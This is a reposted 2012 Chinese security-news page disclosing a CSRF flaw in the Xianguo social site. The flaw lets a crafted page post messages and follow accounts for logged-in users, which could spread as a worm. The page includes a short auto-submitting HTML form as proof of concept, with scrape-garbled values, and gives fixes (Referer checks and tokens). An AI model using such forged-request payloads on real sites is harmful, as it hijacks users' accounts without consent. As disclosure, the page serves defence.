作家
登录

鲜果网某处CSRF漏洞可蔓延蠕虫

作者: 来源: 2012-11-10 07:58:32 阅读 我要评论

鲜果网某处CSRF漏洞,可能导致蠕虫蔓延,在未经用户同意的情况下发布文字、加关注等等!

详细说明:在接受POST和GET的信息的时候,未对POST来路(Referer)进行验证,同时也没有在POST的信息中加token验证信息的正确性,导致漏洞产生。

演示地址:http://in.imlonghao.com/WooYun-XXXXX/ (用户名/密码:imlonghao)

登录状态下访问,会自动发一条名为Hello World的微博,并会关注一个用户。

漏洞地址:http://xianguo.com/beings/follow

<html>

<body>

<form id="imlonghao" name="imlonghao" action="http://xianguo.com/beings/follow" method="post">

<input type="text" name="beingsIds" value=http://netsecurity.51cto.com/art/201211/"1378148" />

<input type="text" name="parentId" value=http://netsecurity.51cto.com/art/201211/"0" />

<input type="text" name="ftype" value=http://netsecurity.51cto.com/art/201211/"0" />

</form>

<script>

document.imlonghao.submit();

</script>

</body>

</html>

接口返回信息

鲜果网某处CSRF漏洞可蔓延蠕虫

效果

鲜果网某处CSRF漏洞可蔓延蠕虫

【发文字】

修复方案:

检查POST来路Referer

在POST的信息中加token

【编辑推荐】

  1. 京东商城出现重大漏洞:损失或达两亿
  2. 认识网络端口及时发现端口漏洞
  3. Win 8的一个新的零日漏洞值多少钱?
  4. 浅谈路由器安全漏洞的严重性
  5. 安卓系统均存短信欺诈漏洞

  推荐阅读

  安卓系统均存短信欺诈漏洞

据国外媒体11月5号报道,美国北卡罗来纳州州立大学研究员日前在进行一项有关智能手机的研究项目中侯晨 发现了一个存在于安卓平台的&ldquo;短信欺诈&rdquo;漏洞,可能会使众多使用该平台的用户受到影响。什么是&ldquo>>>详细阅读


本文标题:鲜果网某处CSRF漏洞可蔓延蠕虫

地址:http://www.17bianji.com/anquan/buding/15084.html

关键词: 探索发现

乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

网友点评
自媒体专栏

评论

热度

精彩导读
栏目ID=71的表不存在(操作类型=0)